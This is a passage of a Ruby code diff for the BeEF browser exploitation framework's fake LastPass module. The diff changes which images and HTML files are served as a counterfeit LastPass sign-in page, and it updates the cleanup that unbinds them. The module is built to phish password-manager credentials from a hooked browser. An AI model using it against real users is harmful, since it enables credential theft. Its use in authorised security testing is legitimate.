-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/lpwhite_small.png','/lp/lpwhite_small','png')
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/q3Jrp.png','/lp/q3Jrp','png')
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/screenkeyboard.png','/lp/screenkeyboard','png')
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/xsmall.png','/lp/xsmall','png')
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/create_small.png','/lp/create_small','png')
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/icon.png','/lp/icon','png')
     BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js','/lp/jquery','js')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/index-new.html','/lp/index','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/lp_signin_logo.png','/lp/lp_signin_logo','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/cancel.png','/lp/cancel','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/keyboard.png','/lp/keyboard','png')
+
   end
   
   #
@@ -25,15 +21,10 @@ class Fake_lastpass < BeEF::Core::Command
   def post_execute
     if (@datastore['meta'] == "KILLFRAME") 
       BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/index.html')
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/indexFF.html')
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/key_small.png')
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/lpwhite_small.png')
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/q3Jrp.png')
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/screenkeyboard.png')
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/xsmall.png') 
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/create_small.png') 
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/icon.png') 
       BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/jquery.js') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/lp_signin_logo.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/cancel.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/keyboard.png') 
     end
     content = {}
     content['result'] = @datastore['result']